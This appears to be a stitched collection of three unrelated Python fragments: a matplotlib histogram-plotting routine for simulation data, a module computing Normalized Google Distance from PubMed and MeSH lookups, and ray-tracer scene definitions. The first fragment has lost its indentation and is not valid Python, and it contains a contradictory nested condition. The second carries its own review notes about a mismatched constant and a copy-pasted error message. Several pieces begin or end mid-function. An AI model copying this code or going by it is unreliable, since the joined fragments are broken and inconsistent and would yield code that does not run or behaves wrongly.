norm = z_scale
if cdf:
raise Exception(
"Not implemented yet. When implementing, use utilities.cumsum2d"
)
im = ax.pcolormesh(
x_edges,
y_edges,
hist2d.transpose(),
cmap = cmap,
norm = norm,
vmin = vmin,
vmax = vmax,
zorder = zorder,
)
# Add a colorbar
if add_colorbar:
if colorbar_args is None:
colorbar_args = ax
cbar = gen_plot.add_colorbar( colorbar_args, im, method='ax' )
else:
colorbar_args['color_object'] = im
cbar = gen_plot.add_colorbar( **colorbar_args )
cbar.ax.tick_params( labelsize=20 )
# Plot Line for easier visual interpretation
if line_slope is not None:
line_x = np.array( [ x_data.min(), x_data.max() ] )
line_y = line_slope*line_x
ax.plot( line_x, line_y, linewidth=3, linestyle='dashed', )
if horizontal_line is not None:
trans = transforms.blended_transform_factory( ax.transAxes, ax.transData )
ax.plot( [ 0., 1. ], [ horizontal_line, ]*2, transform=trans, **horizontal_line_kwargs )
if vertical_line is not None:
trans = transforms.blended_transform_factory( ax.transData, ax.transAxes )
ax.plot( [ vertical_line, ]*2, [ 0., 1. ], transform=trans, **vertical_line_kwargs )
# Plot label
if plot_label is not None:
if plot_label is None:
plt_label = ax.annotate(
s = self.label,
xy = (0.,1.0),
va = 'bottom',
xycoords = 'axes fraction',
fontsize = label_fontsize,
)
elif isinstance( plot_label, str ):
plt_label = ax.annotate(
s = plot_label,
xy = (0.,1.0),
va = 'bottom',
xycoords = 'axes fraction',
fontsize = label_fontsize,
)
elif isinstance( plot_label, dict ):
plt_label = ax.annotate( **plot_label )
else:
raise Exception( 'Unrecognized plot_label arguments, {}'.format( plot_label ) )
if outline_plot_label:
plt_label.set_path_effects([ path_effects.Stroke(linewidth=3, foreground='black'), path_effects.Normal() ])
# Upper right label (info label)
info_label = ''
if label_galaxy_cut:
info_label = r'$r_{ \rm cut } = ' + '{:.3g}'.format( self.data_object.galids.parameters['galaxy_cut'] ) + 'r_{ s}$'
if label_redshift:
try:
info_label = r'$z=' + '{:.3f}'.format( self.data_object.redshift ) + '$'+ info_label
except ValueError:
info_label = r'$z=' + '{:.3f}'.format( self.data_object.redshift.values[sl[1]] ) + '$'+ info_label
if label_galaxy_cut or label_redshift:
ax.annotate( s=info_label, xy=(1.,1.0225), xycoords='axes fraction', fontsize=label_fontsize,
ha='right' )
# Add axis labels
if add_x_label:
if x_label is None:
x_label = x_key
ax.set_xlabel( x_label, fontsize=label_fontsize )
if add_y_label:
if y_label is None:
y_label = y_key
ax.set_ylabel( y_label, fontsize=label_fontsize )
# Limits
ax.set_xlim( x_range )
ax.set_ylim( y_range )
# Scale
ax.set_xscale( x_scale )
ax.set_yscale( y_scale )
# Set tick parameters
if tick_param_args is not None:
ax.tick_params( **tick_param_args )
# Save the file
if out_dir is not None:
if save_file is None:
save_file = '{}_{:03d}.png'.format( self.label, self.data_object.ptracks.snum[slices] )
gen_plot.save_fig( out_dir, save_file, fig=fig, dpi=75 )
if close_plot_after_saving:
plt.close()
# Return?
if return_dist:
return hist2d, x_edges, y_edges
########################################################################
def statistic_and_interval(
self,
x_key, y_key,
x_data = None, y_data = None,
weights = None,
statistic = 'median',
lower_percentile = 16,
upper_percentile = 84,
plot_interval = True,
x_data_args = {}, y_data_args = {},
ax = None,
slices = None,
fix_invalid = False,
bins = 64,
linewidth = 3,
linestyle = '-',
color = 'k',
label = None,
zorder = 100,
alpha = 0.5,
plot_label = None,
add_plot_label = True,
plot_label_kwargs = {
'xy': (0.,1.0),
'va': 'bottom',
'xycoords': 'axes fraction',
'fontsize': 22,
},
return_values = False,
*args, **kwargs
):
if isinstance( slices, int ):
sl = ( slice(None), slices )
else:
sl = slices
varying_kwargs = {
'x': x_data_args,
'y': y_data_args,
}
data_kwargs = utilities.dict_from_defaults_and_variations( kwargs, varying_kwargs )
# Get data
if x_data is None:
x_data = self.data_object.get_selected_data( x_key, sl=sl, *args, **data_kwargs['x'] ).copy()
if y_data is None:
y_data = self.data_object.get_selected_data( y_key, sl=sl, *args, **data_kwargs['y'] ).copy()
# Fix NaNs
if fix_invalid:
x_mask = np.ma.fix_invalid( x_data ).mask
y_mask = np.ma.fix_invalid( y_data ).mask
mask = np.ma.mask_or( x_mask, y_mask )
x_data = np.ma.masked_array( x_data, mask=mask ).compressed()
y_data = np.ma.masked_array( y_data, mask=mask ).compressed()
# Calculate the statistic
if statistic == 'weighted_mean':
assert weights is not None, "Need to provide weights."
weighted_sum, bin_edges, binnumber = scipy.stats.binned_statistic(
x = x_data,
values = y_data * weights,
statistic = 'sum',
bins = bins,
)
weights_sum, bin_edges, | |
__author__ = '<NAME>'
__copyright__ = 'Oregon State University'
__credits__ = ['<NAME>']
__license__ = 'MIT'
__version__ = '0.1.0'
__maintainer__ = ''
__email__ = ''
__status__ = 'Prototype'
import math
import sys
import time
import CachedMethods
from cache_control_helper import CacheControlHelper
import pickledb
import os
import functools
from QueryNCBIeUtils import QueryNCBIeUtils
from QueryDisont import QueryDisont # DOID -> MeSH
from QueryEBIOLS import QueryEBIOLS # UBERON -> MeSH
from QueryMyChem import QueryMyChem
from typing import List
import sqlite3
# requests_cache.install_cache('NGDCache')
# Absolute directory containing this script; used to locate the local cache db files.
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
# pickledb cache mapping arbitrary CURIE identifiers to lists of MeSH IDs.
WHATEVER_TO_MESH_DB_FILE = os.path.join(SCRIPT_DIR, 'curie_to_mesh.db')
# pickledb cache mapping MeSH IDs to lists of PubMed article IDs.
MESH_TO_PUBMED_DB_FILE = os.path.join(SCRIPT_DIR, 'mesh_to_pmid.db')
# Normalizer for the NGD denominator: (articles in PubMed) * (avg MeSH terms per article).
# NOTE(review): the original comment says "27 million articles" but the constant is
# 2.2e+7 (22 million) -- confirm which value is intended.
NGD_NORMALIZER = 2.2e+7 * 20  # articles in PubMed * avg 20 MeSH terms per article
class NormGoogleDistance:
    """Normalized Google Distance (NGD) over PubMed/MeSH co-occurrence.

    Two local pickledb caches (CURIE -> MeSH IDs, MeSH ID -> PubMed IDs)
    provide a fast path; when either cache is missing or a CURIE is not
    cached, the code falls back to live lookups via EBI OXO and the
    NCBI eUtils helpers (QueryNCBIeUtils and friends).
    """

    def __init__(self):
        # Load the CURIE -> MeSH cache if its file exists; otherwise keep
        # None so get_ngd_for_all_fast() falls back to the slow online path.
        # auto_dump=False: the caches are read-only here, never written back.
        if os.path.exists(WHATEVER_TO_MESH_DB_FILE) and os.path.isfile(WHATEVER_TO_MESH_DB_FILE):
            self.db_whatever_to_mesh = pickledb.load(WHATEVER_TO_MESH_DB_FILE, sig=False,
                                                     auto_dump=False)
        else:
            self.db_whatever_to_mesh = None
        # Same pattern for the MeSH -> PubMed-ID cache.
        if os.path.exists(MESH_TO_PUBMED_DB_FILE) and os.path.isfile(MESH_TO_PUBMED_DB_FILE):
            self.db_mesh_to_pubmed = pickledb.load(MESH_TO_PUBMED_DB_FILE, sig=False,
                                                   auto_dump=False)
        else:
            self.db_mesh_to_pubmed = None

    @staticmethod
    def compute_marginal_and_joint_counts(concept_pubmed_ids: List[List[str]]) -> list:
        """Return ``[marginal_counts, joint_count]`` for the given PMID lists.

        marginal_counts: number of *distinct* PMIDs for each concept.
        joint_count: size of the intersection of all the concepts' PMID sets.
        """
        return [list(map(lambda pmid_list: len(set(pmid_list)), concept_pubmed_ids)),
                len(functools.reduce(lambda pmids_intersec_cumul, pmids_next:
                                     set(pmids_next).intersection(pmids_intersec_cumul),
                                     concept_pubmed_ids))]

    @staticmethod
    def compute_multiway_ngd_from_counts(marginal_counts: List[int],
                                         joint_count: int) -> float:
        """Compute the multiway NGD from marginal and joint PMID counts.

        Returns NaN when any count is missing/zero (log undefined) or when
        the log arithmetic itself raises ValueError.
        """
        # Make sure that things are within the right domain for the logs
        # Should also make sure things are not negative, but I'll just do this with a ValueError
        if None in marginal_counts:
            return math.nan
        elif 0 in marginal_counts or 0. in marginal_counts:
            return math.nan
        elif joint_count == 0 or joint_count == 0.:
            return math.nan
        else:
            try:
                # Standard NGD formula: (max log f(x) - log f(x,y)) / (log N - min log f(x)).
                return (max([math.log(count) for count in marginal_counts]) - math.log(joint_count)) / \
                    (math.log(NGD_NORMALIZER) - min([math.log(count) for count in marginal_counts]))
            except ValueError:
                return math.nan

    def get_ngd_for_all_fast(self, curie_id_list: List[str], description_list: List[str]) -> (float, str):
        """Compute NGD for a set of CURIEs, preferring the local caches.

        Returns ``(ngd_value, method)`` where method is "fast" (both caches
        hit for every CURIE) or "slow" (fell back to the online path).
        """
        assert len(curie_id_list) == len(description_list)
        if self.db_whatever_to_mesh is not None and self.db_mesh_to_pubmed is not None:
            mesh_ids_all = [self.db_whatever_to_mesh.get(curie_id) for curie_id in curie_id_list]
            # pickledb.get returns False on a miss, so all() requires every CURIE to be cached.
            if all(mesh_ids_all):
                #print(f"Going fast: {curie_id_list}")  # for debugging purposes and counting db hits
                pubmed_ids_for_curies = []
                for mesh_ids in mesh_ids_all:
                    # Union the PMIDs over all MeSH IDs mapped to this CURIE.
                    pubmed_ids_for_curie_set = set()
                    for mesh_id in mesh_ids:
                        pubmed_ids = self.db_mesh_to_pubmed.get(mesh_id)
                        if pubmed_ids is not False:
                            pubmed_ids_for_curie_set |= set(pubmed_ids)
                    pubmed_ids_for_curies.append(list(pubmed_ids_for_curie_set))
                counts_res = NormGoogleDistance.compute_marginal_and_joint_counts(pubmed_ids_for_curies)
                return NormGoogleDistance.compute_multiway_ngd_from_counts(*counts_res), "fast"
        #print(f"Going slow: {curie_id_list}")  # for debugging purposes and counting db misses
        return NormGoogleDistance.get_ngd_for_all(curie_id_list, description_list), "slow"

    @staticmethod
    @CachedMethods.register
    def query_oxo(uid):
        """
        Query the EMBL-EBI OXO mappings endpoint for the given CURIE.

        Returns the requests response object on HTTP 200, else None
        (timeouts, connection errors, sqlite cache errors, non-200 status).
        """
        url_str = 'https://www.ebi.ac.uk/spot/oxo/api/mappings?fromId=' + str(uid)
        # NOTE: this local deliberately shadows the usual `requests` module;
        # CacheControlHelper exposes a requests-compatible interface including
        # the `exceptions` namespace used below.
        requests = CacheControlHelper()
        try:
            res = requests.get(url_str, headers={'accept': 'application/json'}, timeout=120)
        except requests.exceptions.Timeout:
            # NOTE(review): the message mentions SemMedInterface.py but this is a
            # different module -- the string looks copy-pasted; confirm before relying on it in logs.
            print('HTTP timeout in SemMedInterface.py; URL: ' + url_str, file=sys.stderr)
            time.sleep(1)  ## take a timeout because NCBI rate-limits connections
            return None
        except requests.exceptions.ConnectionError:
            print('HTTP connection error in SemMedInterface.py; URL: ' + url_str, file=sys.stderr)
            time.sleep(1)  ## take a timeout because NCBI rate-limits connections
            return None
        except sqlite3.OperationalError:
            # The HTTP-cache layer stores responses in sqlite; treat cache
            # read failures like any other transient failure.
            print('Error reading sqlite cache; URL: ' + url_str, file=sys.stderr)
            return None
        status_code = res.status_code
        if status_code != 200:
            print('HTTP response status code: ' + str(status_code) + ' for URL:\n' + url_str, file=sys.stderr)
            res = None
        return res

    @staticmethod
    @CachedMethods.register
    def get_mesh_from_oxo(curie_id):
        """Map a CURIE to a list of MeSH IDs via EBI OXO, or None if none found."""
        if type(curie_id) != str:
            curie_id = str(curie_id)
        # OXO knows Reactome by its full prefix, not the Biolink-style 'REACT'.
        if curie_id.startswith('REACT:'):
            curie_id = curie_id.replace('REACT', 'Reactome')
        res = NormGoogleDistance.query_oxo(curie_id)
        mesh_ids = None
        if res is not None:
            res = res.json()
            mesh_ids = set()
            n_res = res['page']['totalElements']
            if int(n_res) > 0:
                mappings = res['_embedded']['mappings']
                for mapping in mappings:
                    # NOTE(review): asymmetric check -- 'MeSH' on fromTerm but 'UMLS'
                    # on toTerm, and both extract the bare accession after ':'.
                    # Looks suspicious (UMLS CUIs are not MeSH IDs); confirm intent.
                    if mapping['fromTerm']['curie'].startswith('MeSH'):
                        mesh_ids |= set([mapping['fromTerm']['curie'].split(':')[1]])
                    elif mapping['toTerm']['curie'].startswith('UMLS'):
                        mesh_ids |= set([mapping['toTerm']['curie'].split(':')[1]])
            if len(mesh_ids) == 0:
                mesh_ids = None
            else:
                mesh_ids = list(mesh_ids)
        return mesh_ids

    @staticmethod
    @CachedMethods.register
    def get_mesh_term_for_all(curie_id, description):
        """
        Takes a curie ID, detects the ontology from the curie id, and then finds the mesh term
        Params:
            curie_id - A string containing the curie id of the node. Formatted <source abbreviation>:<number> e.g. DOID:8398
            description - A string containing the English name for the node
        current functionality (+ means has it, - means does not have it)
            "Reactome" +
            "GO" - found gene conversion but no biological process conversion
            "UniProt" +
            "HP" +
            "UBERON" +
            "CL" - not supposed to be here?
            "NCBIGene" +
            "DOID" +
            "OMIM" +
            "ChEMBL" +
        Falls back to the raw description (with ';' replaced by '|') when no
        MeSH term can be resolved.
        """
        if type(description) != str:
            description = str(description)
        curie_list = curie_id.split(':')
        names = None
        # Shortcut: if the description itself is already a MeSH term, use it directly.
        if QueryNCBIeUtils.is_mesh_term(description):
            return [description + '[MeSH Terms]']
        # First try the generic OXO mapping; only on failure use per-ontology lookups.
        names = NormGoogleDistance.get_mesh_from_oxo(curie_id)
        if names is None:
            if curie_list[0].lower().startswith("react"):
                res = QueryNCBIeUtils.get_reactome_names(curie_list[1])
                if res is not None:
                    names = res.split('|')
            elif curie_list[0] == "GO":
                # No conversion available for GO biological-process terms (see docstring).
                pass
            elif curie_list[0].startswith("UniProt"):
                res = QueryNCBIeUtils.get_uniprot_names(curie_list[1])
                if res is not None:
                    names = res.split('|')
            elif curie_list[0] == "HP":
                names = QueryNCBIeUtils.get_mesh_terms_for_hp_id(curie_id)
            elif curie_list[0] == "UBERON":
                # Strip a trailing 'PHENOTYPE' suffix (9 characters) before lookup.
                if curie_id.endswith('PHENOTYPE'):
                    curie_id = curie_id[:-9]
                mesh_id = QueryEBIOLS.get_mesh_id_for_uberon_id(curie_id)
                names = []
                for entry in mesh_id:
                    if len(entry.split('.')) > 1:
                        # Dotted entries are MeSH tree numbers; expand to UIDs first.
                        uids = QueryNCBIeUtils.get_mesh_uids_for_mesh_tree(entry.split(':')[1])
                        for uid in uids:
                            try:
                                # 'D'-prefixed accession -> numeric MeSH UID (D-descriptor offset 68000000).
                                uid_num = int(uid.split(':')[1][1:]) + 68000000
                                names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
                            except IndexError:
                                # No ':' in uid: it is already a bare numeric UID.
                                uid_num = int(uid)
                                names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
                    else:
                        try:
                            uid = entry.split(':')[1]
                            uid_num = int(uid[1:]) + 68000000
                            names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
                        except IndexError:
                            uid_num = int(entry)
                            names += QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
                if len(names) == 0:
                    names = None
                else:
                    # Tag the first name so downstream code treats it as a MeSH term.
                    names[0] = names[0] + '[MeSH Terms]'
            elif curie_list[0] == "NCBIGene":
                gene_id = curie_id.split(':')[1]
                names = QueryNCBIeUtils.get_pubmed_from_ncbi_gene(gene_id)
            elif curie_list[0] == "DOID":
                mesh_id = QueryDisont.query_disont_to_mesh_id(curie_id)
                names = []
                for uid in mesh_id:
                    uid_num = int(uid[1:]) + 68000000
                    name = QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(uid_num)
                    if name is not None:
                        names += name
                if len(names) == 0:
                    names = None
                else:
                    names[0] = names[0] + '[MeSH Terms]'
            elif curie_list[0] == "OMIM":
                names = QueryNCBIeUtils.get_mesh_terms_for_omim_id(curie_list[1])
            elif curie_list[0] == "ChEMBL":
                chembl_id = curie_id.replace(':', '').upper()
                mesh_id = QueryMyChem.get_mesh_id(chembl_id)
                if mesh_id is not None:
                    mesh_id = int(mesh_id[1:]) + 68000000
                    names = QueryNCBIeUtils.get_mesh_terms_for_mesh_uid(mesh_id)
        if names is not None:
            if type(names) == list:
                # Prefer a single already-tagged MeSH term when one exists.
                for name in names:
                    if name.endswith('[MeSH Terms]'):
                        return [name]
            return names
        # Last resort: use the description itself ('|' is the term separator downstream).
        return [description.replace(';', '|')]

    @staticmethod
    # @CachedMethods.register
    def get_ngd_for_all(curie_id_list, description_list):
        """
        Takes a list of curie ids and descriptions then calculates the normalized google distance for the set of nodes.
        Params:
            curie_id_list - a list of strings containing the curie ids of the nodes. Formatted <source abbreviation>:<number> e.g. DOID:8398
            description_list - a list of strings containing the English names for the nodes
        """
        assert len(curie_id_list) == len(description_list)
        # Resolve each CURIE to a list of search terms (capped at 30 per concept).
        terms = [None] * len(curie_id_list)
        for a in range(len(description_list)):
            terms[a] = NormGoogleDistance.get_mesh_term_for_all(curie_id_list[a], description_list[a])
            if type(terms[a]) != list:
                terms[a] = [terms[a]]
            if len(terms[a]) == 0:
                terms[a] = [description_list[a]]
            if len(terms[a]) > 30:
                terms[a] = terms[a][:30]
        # Combine each concept's terms into a single query string and track
        # whether it can be treated as a pure MeSH-term query.
        terms_combined = [''] * len(terms)
        mesh_flags = [True] * len(terms)
        for a in range(len(terms)):
            if len(terms[a]) > 1:
                if not terms[a][0].endswith('[uid]'):
                    for b in range(len(terms[a])):
                        if QueryNCBIeUtils.is_mesh_term(terms[a][b]) and not terms[a][b].endswith('[MeSH Terms]'):
                            terms[a][b] += '[MeSH Terms]'
                terms_combined[a] = '|'.join(terms[a])
                mesh_flags[a] = False
            else:
                terms_combined[a] = terms[a][0]
                if terms[a][0].endswith('[MeSH Terms]'):
                    # Strip the 12-character '[MeSH Terms]' tag; the flag stays True.
                    terms_combined[a] = terms[a][0][:-12]
                elif not QueryNCBIeUtils.is_mesh_term(terms[a][0]):
                    mesh_flags[a] = False
        ngd = QueryNCBIeUtils.multi_normalized_google_distance(terms_combined, mesh_flags)
        return ngd

    @staticmethod
    def api_ngd(mesh_term1, mesh_term2):
        """Compute the pairwise NGD of two MeSH terms, as an API-style dict.

        Returns {'response_code': 'TermNotFound', 'message': ...} when either
        term is not in MeSH, else {'response_code': 'OK', 'value': float|None}
        (None when the distance is NaN).
        """
        response = {}
        if not QueryNCBIeUtils.is_mesh_term(mesh_term2):
            response['message'] = "Term 2 '" + mesh_term2 + "' not found in MeSH"
        if not QueryNCBIeUtils.is_mesh_term(mesh_term1):
            # Merge with the term-2 message when both terms are missing.
            if 'message' in response.keys():
                response['message'] = "Term 1 '" + mesh_term1 + "' and " + response['message']
            else:
                response['message'] = "Term 1 '" + mesh_term1 + "' not found in MeSH"
        if 'message' in response:
            response["response_code"] = "TermNotFound"
            return response
        else:
            value = QueryNCBIeUtils.multi_normalized_google_distance([mesh_term1, mesh_term2])
            print(type(value))
            # NaN is not JSON-representable; report it as a null value.
            if math.isnan(value):
                response['value'] = None
                response['response_code'] = "OK"
            else:
                response['response_code'] = "OK"
                response['value'] = value
            return response

    @staticmethod
    # @CachedMethods.register
    def get_pmids_for_all(curie_id_list, description_list):
        """
        Takes a list of curie ids and descriptions and returns, per node, the
        list of matching PubMed IDs (each prefixed with 'PMID:').
        Params:
            curie_id_list - a list of strings containing the curie ids of the nodes. Formatted <source abbreviation>:<number> e.g. DOID:8398
            description_list - a list of strings containing the English names for the nodes
        """
        # NOTE(review): the term-resolution loop below duplicates
        # get_ngd_for_all() almost line for line; a shared helper would keep
        # the two in sync, but is left as-is to avoid changing cached behavior.
        assert len(curie_id_list) == len(description_list)
        terms = [None] * len(curie_id_list)
        for a in range(len(description_list)):
            terms[a] = NormGoogleDistance.get_mesh_term_for_all(curie_id_list[a], description_list[a])
            if type(terms[a]) != list:
                terms[a] = [terms[a]]
            if len(terms[a]) == 0:
                terms[a] = [description_list[a]]
            if len(terms[a]) > 30:
                terms[a] = terms[a][:30]
        terms_combined = [''] * len(terms)
        mesh_flags = [True] * len(terms)
        for a in range(len(terms)):
            if len(terms[a]) > 1:
                if not terms[a][0].endswith('[uid]'):
                    for b in range(len(terms[a])):
                        if QueryNCBIeUtils.is_mesh_term(terms[a][b]) and not terms[a][b].endswith('[MeSH Terms]'):
                            terms[a][b] += '[MeSH Terms]'
                terms_combined[a] = '|'.join(terms[a])
                mesh_flags[a] = False
            else:
                terms_combined[a] = terms[a][0]
                if terms[a][0].endswith('[MeSH Terms]'):
                    terms_combined[a] = terms[a][0][:-12]
                elif not QueryNCBIeUtils.is_mesh_term(terms[a][0]):
                    mesh_flags[a] = False
        pmids = QueryNCBIeUtils.multi_normalized_pmids(terms_combined, mesh_flags)
        pmids_with_prefix = []
        for lst in pmids:
            pmids_with_prefix.append([f"PMID:{x}" for x in lst])
        return pmids_with_prefix
def test01():
res = NormGoogleDistance.compute_marginal_and_joint_counts([['a', 'b', 'a'], ['a', 'd'], ['e', 'a', 'c']])
assert abs(NormGoogleDistance.compute_multiway_ngd_from_counts(*res) - 0.05719216982573684) | |
use checkerboard vs image texture
diffuse_2 = Lambertian(checker_board, name="checkerboard")
# diffuse_2 = Lambertian(odd_color, name="odd_color")
else:
diffuse_2 = Lambertian(logo, name="io_logo'")
metal_1 = Metal(silver, name="metal_1")
world = GeometryList()
world.add(Sphere(Vec3(0, 1.25, 0.35), 1.0, metal_1))
# world.add(Sphere(Vec3(0, 1.0001, 0.35), 1.0, metal_1))
if True: # use plane vs triangles
plane_1 = Plane.plane_from_point_and_normal(pt=Vec3(0, -1, 0), normal=Vec3(0, 1, 0), material=diffuse_2)
world.add(plane_1)
else:
plane_x = 2
plane_y = -1
back_plane_z = -2
front_plane_z = 3
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,0)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1, 0)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1, 1)
triangle = Triangle(v0, v1, v2, diffuse_2, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, diffuse_2, uv1, uv2, uv3)
world.add(triangle)
ambient = Vec3(0.5,0.5,0.5)
# ambient = Vec3(0.3,0.3,0.3)
background = SolidColor(Vec3(0.5, 0.7, 1.0))
# background = SolidColor(Vec3(0,0,0))
# light_1 = PointLight(pos=Vec3(11,10,3), color=Vec3(0.25, 0.25, 0.25))
geom = Disc(center=Vec3(11,10,3), normal=Vec3(0,-1,0), radius=1.5, material=SolidColor(Vec3(0.7, 0.7, 0.7)))
if settings and 'SAMPLES_PER_LIGHT' in settings:
samples = settings['SAMPLES_PER_LIGHT']
else:
samples = 25
light_2 = AreaLight(geom=geom, color=Vec3(0.6, 0.6, 0.6), num_samples=samples)
lights = [light_2]
scene = Scene(world, ambient=ambient, lights=lights, background=background)
camera = Camera(look_from=Vec3(8.5, 4, 0), look_at=Vec3(0, 1, 0), vup=Vec3(0, 1, 0), vert_fov=25)
return {'scene': scene, 'camera': camera}
def create_canonical_2(settings=None):
    """
    Teapot scene: a matte STL teapot standing on a checkerboard floor,
    lit by a single point light.

    TEAPOT_thingiverse.stl -- bbox=AABB(vmin=(-15.000, -10.005, -9.088), vmax=(16.371, 10.005, 7.162)), num_triangles=87298

    Returns a dict with 'scene' and 'camera' entries.
    """
    # --- layout constants -------------------------------------------------
    checker_spacing = 0.5
    stl_filename = Path("models/TEAPOT_thingiverse.stl")
    rot_axis = [1, 0, 0]
    rot_rads = math.pi / 2.0  # rotate 90 degrees about X to stand the model up
    look_from = Vec3(0, 15, 60)
    look_at = Vec3(0, -1.5, 0)
    plane_y = -9.1
    plane_x = 25
    back_plane_z = -25
    front_plane_z = 15
    light1_pos = Vec3(11, 10, 3)

    # --- materials --------------------------------------------------------
    silver = SolidColor(Vec3(0.7, 0.7, 0.7))
    light_gray = SolidColor(Vec3(0.85, 0.85, 0.85))
    odd_color = SolidColor(Vec3(0.2, 0.75, 0.2))
    even_color = SolidColor(Vec3(0.1, 0.1, 0.1))
    checker_board = CheckerBoard(even_color, odd_color, spacing=checker_spacing)
    diffuse_1 = Lambertian(checker_board, name="checkerboard")
    diffuse_2 = Lambertian(light_gray, name="silver_matte")
    fuzz = 0.2
    metal_1 = Metal(silver, fuzziness=fuzz, name="chrome")

    # --- geometry ---------------------------------------------------------
    world = GeometryList()
    my_mesh = mesh.Mesh.from_file(stl_filename)
    my_mesh.rotate(rot_axis, rot_rads)
    teapot_matl = diffuse_2  # swap in metal_1 for a chrome teapot
    stl_mesh = STLMesh(my_mesh, teapot_matl, name="teapot")
    print(f'stl_mesh {stl_filename} -- bbox={stl_mesh.bounding_box(None, None)}, num_triangles={stl_mesh.num_triangles}')
    world.add(stl_mesh)

    # Floor as a two-triangle quad (an infinite Plane via
    # Plane.plane_from_point_and_normal is the alternative, but triangles
    # carry explicit UVs for the checker texture).
    corner_fl = Vec3(-plane_x, plane_y, front_plane_z)  # front-left
    corner_bl = Vec3(-plane_x, plane_y, back_plane_z)   # back-left
    corner_fr = Vec3(plane_x, plane_y, front_plane_z)   # front-right
    corner_br = Vec3(plane_x, plane_y, back_plane_z)    # back-right
    uv_fl, uv_bl, uv_fr, uv_br = (0, 0), (0, 1), (1, 0), (1, 1)
    world.add(Triangle(corner_fl, corner_bl, corner_fr, diffuse_1, uv_fl, uv_bl, uv_fr))
    world.add(Triangle(corner_bl, corner_fr, corner_br, diffuse_1, uv_bl, uv_fr, uv_br))

    # --- lighting and camera ----------------------------------------------
    ambient = Vec3(0.5, 0.5, 0.5)
    background = SolidColor(Vec3(0.5, 0.7, 1.0))
    light_1 = PointLight(pos=light1_pos, color=Vec3(0.5, 0.5, 0.5))
    lights = [light_1]
    scene = Scene(world, ambient=ambient, lights=lights, background=background)
    camera = Camera(look_from=look_from, look_at=look_at, vup=Vec3(0, 1, 0), vert_fov=25)
    return {'scene': scene, 'camera': camera}
def create_perlin_1(settings=None):
    """
    Procedural-noise demo scene: a jade (marble-noise) dragon STL over a
    shiny wood-textured floor, lit by a disc-shaped area light.

    Params:
        settings - optional dict of render options; 'SAMPLES_PER_LIGHT'
                   (int) sets the area-light sample count (default 25).

    Returns a dict with 'scene' and 'camera' entries.
    """
    green = SolidColor(Vec3(0.2, 0.7, 0.2))
    brown = SolidColor(Vec3(0.7, 0.5, 0.3))

    # Wood texture: a colorcet ramp driven by the wood noise pattern.
    wood_point_scale = 20.0
    wood, wood_name = (cc.CET_D6[155:240], 'wood3')
    wood_colormap = [get_color(i, wood) for i in range(len(wood))]
    wood_noise_kwargs = {'frequency': 0.01, 'frequency_mult': 10, }
    wood_texture = NoiseTexture(wood_colormap, point_scale=wood_point_scale, translate=1.0, scale=0.5,
                                name=wood_name, eval_func=wood_pattern, eval_kwargs=wood_noise_kwargs)

    # Jade texture: marble noise pattern over a green colorcet ramp.
    jade, jade_name = (cc.CET_D13[135:240], 'jade2')
    jade_colormap = [get_color(i, jade) for i in range(len(jade))]
    jade_noise_kwargs = {'frequency': 0.024, 'frequency_mult': 2.5, 'amplitude_mult': 0.5, 'layers': 7, 'displace_x': 200}
    jade_point_scale = 6.0
    jade_texture = NoiseTexture(jade_colormap, point_scale=jade_point_scale, translate=0.20, scale=1.0,
                                name=jade_name, eval_func=marble_pattern, eval_kwargs=jade_noise_kwargs)

    # Material palette; unused entries are kept as easy swap-ins.
    diffuse_2 = Lambertian(jade_texture, name="jade")
    diffuse_3 = Lambertian(green, name="solid green")
    diffuse_4 = Lambertian(brown, name="solid brown")
    metal_1 = Metal(wood_texture, name="shiny wood", fuzziness=0.2)
    metal_2 = Metal(jade_texture, name="metal_1", fuzziness=0.3)
    ground_matl = metal_1   # alternative: diffuse_4
    object_matl = diffuse_2  # alternatives: metal_2, diffuse_3

    world = GeometryList()
    # BUG FIX: the original stored the scene layout in a local variable that
    # shadowed the `settings` parameter, so a caller-supplied
    # 'SAMPLES_PER_LIGHT' was silently ignored (always 25).  The layout now
    # lives in `scene_config` and the caller's `settings` is honored below.
    use_sphere = False  # flip to render a simple sphere instead of the dragon
    if use_sphere:
        world.add(Sphere(Vec3(0, 0.0, 0.0), 8.0, object_matl))
        scene_config = {'look_from': Vec3(0.0, 10, 40), 'look_at': Vec3(0, 0.25, 0),
                        'plane_x': 24, 'plane_y': -8.0, 'back_plane_z': -25, 'front_plane_z': 20,
                        'rot_axis': [1, 0, 0], 'rot_rads': math.pi / 2, 'translate': [0, 0, -12.5], 'show_walls': True}
    else:
        stl_filename = "models/dragon_65.stl"
        scene_config = {'look_from': Vec3(0.0, 10, 40), 'look_at': Vec3(0, 0.25, 0),
                        'plane_x': 24, 'plane_y': -7.221, 'back_plane_z': -25, 'front_plane_z': 20,
                        'rot_axis': [1, 0, 0], 'rot_rads': math.pi / 2, 'translate': [0, 0, -12.5], 'show_walls': True}
        # The STL load lives inside this branch so the sphere path cannot hit
        # a NameError on stl_filename (the original used two toggles that had
        # to be flipped together).  A stray no-op `settings['translate'][0]`
        # expression was also removed here.
        my_mesh = mesh.Mesh.from_file(stl_filename)
        if 'translate' in scene_config:
            my_mesh.translate([scene_config['translate'][0], scene_config['translate'][1], scene_config['translate'][2]])
        if 'rot_axis' in scene_config and scene_config['rot_axis'] is not None:
            my_mesh.rotate(scene_config['rot_axis'], scene_config['rot_rads'])
        stl_mesh = STLMesh(my_mesh, object_matl, name="mesh_1")
        print(f'stl_mesh {stl_filename} -- bbox={stl_mesh.bounding_box(None, None)}, num_triangles={stl_mesh.num_triangles}')
        world.add(stl_mesh)

    # Floor: two textured triangles (an infinite Plane is the alternative,
    # but triangles carry explicit UVs for the wood texture).
    plane_x = scene_config['plane_x']
    plane_y = scene_config['plane_y']
    back_plane_z = scene_config['back_plane_z']
    front_plane_z = scene_config['front_plane_z']
    v0 = Vec3(-plane_x, plane_y, front_plane_z)
    uv0 = (0, 0)
